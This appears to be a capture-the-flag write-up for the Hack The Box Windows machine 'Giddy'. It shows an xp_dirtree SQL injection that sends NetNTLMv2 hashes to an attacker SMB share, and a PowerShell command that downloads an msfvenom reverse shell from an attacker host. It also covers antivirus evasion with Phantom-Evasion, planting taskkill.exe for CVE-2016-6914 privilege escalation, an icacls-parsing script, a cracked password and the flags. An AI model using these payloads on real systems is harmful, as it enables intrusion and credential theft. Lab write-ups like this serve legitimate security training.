HTB Giddy Windows
Recon
Nmap scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Gobuster
Under the /remote directory we find a Windows Server 2016 Remote Desktop Web Access login page.
Under the /mvc directory we find a running web app with a search function.
Exploitation Method 1 SQL Injection and BURPSUITE
After a little trial and error we find that the search parameter of the web app is vulnerable to SQL injection. Searching for the following string (the trailing -- comments out the rest of the query) shows it:
caps--
We start Burp Suite and send a search request for "caps--" to the server.
We capture the request with Burp Suite and modify the search value to:
' EXEC master.sys.xp_dirtree '\\10.10.14.34\share'--
xp_dirtree makes the account SQL Server runs as (here Stacy) open an SMB connection to our share, and that connection carries its NetNTLMv2 authentication.
We run Responder with the -I tun0 option so that it acts as the SMB server, then forward the request and capture the NetNTLMv2 hash:
responder -I tun0
Finally we use John (--format=netntlmv2) to crack the hash:
Stacy : xNnWo6272k7x
We use the obtained credentials to log in to the /remote directory.
Privilege Escalation Ubiquiti UniFi Video and Phantom-Evasion
We find a program called Ubiquiti UniFi Video installed. This program is vulnerable to a local privilege escalation, CVE-2016-6914: the service runs as NT AUTHORITY\SYSTEM and, when stopped or started, executes taskkill.exe from its own installation directory, which normal users can write to, so a binary of that name planted there runs as SYSTEM.
We create an msfvenom reverse shell named taskkill.exe and upload it to the target machine:
powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe"
However, the antivirus detects our malicious shell and blocks its execution. To overcome this we download and install Phantom-Evasion:
https://github.com/oddcod3/Phantom-Evasion
With it we generate an obfuscated x64 msfvenom payload, again named taskkill.exe, and upload it to the target machine:
powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe"
We set up multi/handler to catch our shell.
We run Stop-Service "Ubiquiti UniFi Video" to stop the service, then Start-Service "Ubiquiti UniFi Video" to restart it; the service executes our planted taskkill.exe.
Finally we obtain an NT AUTHORITY\SYSTEM shell.
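The precondition CVE-2016-6914 relies on is that a normal user can write into the directory the service loads taskkill.exe from. A quick way to confirm that on the target is to run icacls against the UniFi Video directory and look for write rights granted to low-privileged groups. The Python below is an added example, not code from the original writeup or from Ubiquiti; it parses pasted icacls output and reports directories where such a binary could be planted. The sample output is constructed for the demonstration, and the path C:\ProgramData\unifi-video is an assumption.

```python
import re

# Principals an ordinary user (assumption: we run as Stacy) is a member of.
LOW_PRIV = {r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users", "Everyone",
            r"NT AUTHORITY\INTERACTIVE"}
# icacls rights that allow creating or replacing a file in the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW"}

# icacls prints "<path> <principal>:(flags)(rights)" for the first ACE and
# indents the remaining ACEs on their own lines. Paths are assumed to contain
# no spaces.
ACE_RE = re.compile(
    r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?(?P<principal>[^:]+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(output: str):
    """Yield (path, principal, tokens) for every ACE in icacls output."""
    path = None
    for raw in output.splitlines():
        m = ACE_RE.match(raw.strip())
        if not m:
            continue  # blank line or the "Successfully processed" summary
        if m.group("path"):
            path = m.group("path")
        # Split "(OI)(CI)(F)" or "(Rc,S,WD)" into individual tokens.
        tokens = [t.strip() for grp in re.findall(r"\(([^)]*)\)", m.group("rights"))
                  for t in grp.split(",")]
        yield path, m.group("principal"), tokens


def find_plantable_dirs(output: str):
    """Return [(path, principal, write_rights)] for every allow-ACE that gives a
    low-privileged principal write access, i.e. where taskkill.exe could be planted."""
    hits = []
    for path, principal, tokens in parse_icacls(output):
        if principal not in LOW_PRIV or "DENY" in tokens:
            continue
        granted = sorted(set(tokens) & WRITE_RIGHTS)
        if granted:
            hits.append((path, principal, granted))
    return hits


# Constructed sample icacls output (not taken from the box); the UniFi Video
# path is an assumption.
SAMPLE_ICACLS = r"""
C:\ProgramData\unifi-video BUILTIN\Users:(OI)(CI)(F)
                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                           BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Windows\System32 NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                    BUILTIN\Users:(OI)(CI)(RX)
                    Everyone:(DENY)(W)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, rights in find_plantable_dirs(SAMPLE_ICACLS):
        print(f"{path}: {who} has {','.join(rights)} -> plant taskkill.exe here")
```

On the target you would run icacls "C:\ProgramData\unifi-video" (or wherever the service is installed) and paste the output in; only Users' (F) on the UniFi directory is reported, while the read-only and deny entries on System32 are ignored.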
Exploitation Method 2 MSF
Microsoft SQL Server SQLi NTLM Stealer, pointed at the injectable search parameter:
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
SMB capture module, to receive the NetNTLMv2 authentication:
use auxiliary/server/capture/smb
Use John to crack the captured hash in format netntlmv2:
Stacy : xNnWo6272k7x
FLAGS
Root CF559C6C121F683BF3E56891E80641B1
User 10C1C275385280605E96ADD808C1A0AD